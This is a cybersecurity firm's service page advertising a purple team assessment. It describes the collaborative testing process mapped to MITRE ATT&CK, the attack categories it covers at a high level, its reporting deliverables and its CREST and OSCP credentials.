Services

Purple Team Assessment

Our purple team assessment unites offense and defense, testing attack scenarios and validating detection and response capabilities.

Close the gap in your detection and response coverage

Bridge the ops gap: See what works. Fix what doesn’t.

A purple team assessment is a collaborative adversarial exercise. Offensive Security Certified Professional (OSCP) and CREST Registered Penetration Tester (CRT)-certified operators execute MITRE ATT&CK-mapped techniques openly alongside your blue team. After each technique, both sides review what was detected, what was missed, and what needs tuning before moving to the next step. Unlike a red team assessment — which tests end-to-end resilience covertly — a purple team assessment is transparent by design. It is built to identify gaps in your cybersecurity defences and improve detection coverage and response workflows during the engagement itself.

Attackers dwell longest where detection coverage is weakest

Undetected intrusions result in the worst damage

In September 2024, US officials confirmed that the China-linked advanced persistent threat group Salt Typhoon had been operating inside the networks of at least nine major telecommunications providers — including AT&T, Verizon, and Lumen — for more than a year without triggering a single security alert. Using living-off-the-land techniques, the attackers moved laterally through production infrastructure and accessed lawful intercept systems, all while evading effective detection across critical stages of the intrusion. The US Cybersecurity and Infrastructure Security Agency (CISA) confirmed the campaign stayed hidden for over 18 months. A purple team assessment would have identified the missing detections for lateral movement, privileged access activity, and living-off-the-land techniques before Salt Typhoon operated undetected for more than a year.

Read more

For a mature security operations function, the question is not whether attacks can be simulated, but whether your current controls detect them consistently enough to support timely triage and response. A purple team assessment gives regulators and auditors the documented, technique-level evidence of your security controls while helping your team close detection gaps during the exercise, not only after it.

Gartner Peer Insight Review

How a purple team assessment improves detection coverage

Train together. Defend better. Win faster.

Based on the agreed objectives and attack scenarios, Swarmnetics works directly with your defenders in a shared test-and-tune cycle. Our operators execute techniques aligned to the MITRE ATT&CK framework, one by one, while your team validates alerting, triage, and response outcomes after each step. That lets your incident response team tune alerts, update detection rules, and refine response playbooks as the exercise runs, producing measurable gains in detection coverage instead of a post-engagement gap list alone.

Swarmnetics uses Atomic Red Team for standardised attack simulation, Caldera for automated adversary emulation, and PowerSploit for lateral movement. Testing spans five structured phases — preparation and planning, threat intelligence integration, attack execution and detection, defence analysis, and knowledge transfer — covering threat actor profiling, control mapping against your defensive strategies, and gap analysis. The objective is not to generate tool output for its own sake, but to validate which ATT&CK-mapped behaviours your team detects reliably, which detections need tuning, and where response procedures break down. This purple team exercise helps your organisation prevent, detect, and respond to attacker behaviour with stronger evidence at each step.

Yes, we are CREST accredited

Our core team is based in Singapore and consists of CREST certified penetration testers who are also Offensive Security Certified Professional (OSCP) certified. The team has delivered numerous penetration testing projects for customers in Singapore and other locations, from large multinational enterprises to small and medium business, and across various industries.

Learn more
CREST Pentest

Purple team assessment: controls under test

Because the best lessons come under pressure

A purple team assessment evaluates your ability to prevent, detect, and respond across:

  • Initial access techniques: exploitation of public-facing systems and valid account abuse
  • Persistence mechanisms: scheduled tasks, registry modifications, and backdoor implants
  • Privilege escalation across local and domain boundaries
  • Lateral movement via remote services, pass-the-hash, and trust exploitation
  • Defence evasion: living-off-the-land binaries, log tampering, and anti-forensic techniques
  • Credential access through memory dumping and network credential interception
  • Command and control patterns, including DNS tunnelling and encrypted channels
  • Data exfiltration controls and data loss prevention monitoring, including identified vulnerabilities in egress paths

Across these techniques, the assessment tests not only whether controls exist, but whether they generate usable detections, support analyst decision-making, and improve response effectiveness under realistic conditions.

FAQ

A red team assessment is covert: Swarmnetics operates without alerting your blue team, testing whether your organisation detects a sustained attack. A purple team assessment is transparent. It brings red and blue teams together to execute MITRE ATT&CK techniques openly, so your security team can tune alerts and improve playbooks during the engagement rather than after it.

Swarmnetics tests across the full MITRE ATT&CK Enterprise Matrix, including initial access, persistence, privilege escalation, lateral movement, defence evasion, credential access, command and control, and exfiltration. Both teams agree the specific techniques in scope during planning, based on your threat profile and the maturity of your current detection and response controls.

A purple team assessment requires active participation from your blue team throughout the assessment phase. Your analysts monitor detection tools while Swarmnetics executes each MITRE ATT&CK technique. Both teams then review the detection outcome before moving to the next step. This execute-detect-review loop drives measurable improvement in detection coverage across the techniques tested.

Attackers who establish persistence and move laterally undetected can reach critical systems, harvest credentials, and maintain access for months. The techniques that produce the longest dwell times are precisely those a purple team assessment surfaces and validates against your live detection controls.

A purple team assessment from Swarmnetics produces a draft report for your review, followed by a final report upon acceptance. The report includes an executive summary, a detailed MITRE ATT&CK coverage heatmap showing detection successes, failures, and response gaps identified during the collaborative exercise, and specific recommendations for strengthening your security controls and processes. The report maps every tested technique to your current detection and response capability, providing a clear prioritised improvement roadmap. After you have addressed the findings, Swarmnetics is available to discuss remediation priorities and support implementation planning.

A purple team assessment is relevant to any organisation that wants to identify specific gaps in their detection and response capabilities against defined MITRE ATT&CK techniques. It is particularly valuable for organisations subject to regulatory, contractual, or industry security requirements, which requires validation of their security controls effectiveness through realistic adversarial testing. Swarmnetics recommends a purple team assessment for organisations that have completed foundational security assessments and are ready to test their controls and response capabilities against realistic threats.

The duration of a purple team assessment depends on the number of MITRE ATT&CK techniques in scope and the depth of the collaborative testing sessions. A typical purple team assessment runs for two to four weeks of collaborative testing, followed by an initial report within five business days for your review.

A purple team assessment directly supports compliance with applicable regulatory, contractual, or industry security obligations to validate the effectiveness of detection and response capabilities against realistic threats. It provides documented evidence of detection and response capability assessment against defined threat techniques that regulators and auditors may request.

Every purple team assessment follows a three-phase process. In the planning phase, Swarmnetics agrees the objectives, scenarios, and schedule with your team. In the assessment phase, our consultants execute MITRE ATT&CK techniques collaboratively with your blue team, providing real-time feedback on detection and response effectiveness after each technique. In the reporting phase, we deliver a draft report for review and a final report with specific, prioritised recommendations.

All Swarmnetics adversarial emulation engagements are conducted by our Singapore-based team of security consultants holding the Offensive Security Certified Professional (OSCP) and CREST Registered Penetration Tester (CRT) credentials. Swarmnetics has been delivering technical security assessments to organisations across Singapore since 2015 and serves as a trusted VAPT partner for leading enterprises across technology, telecommunications, and professional services.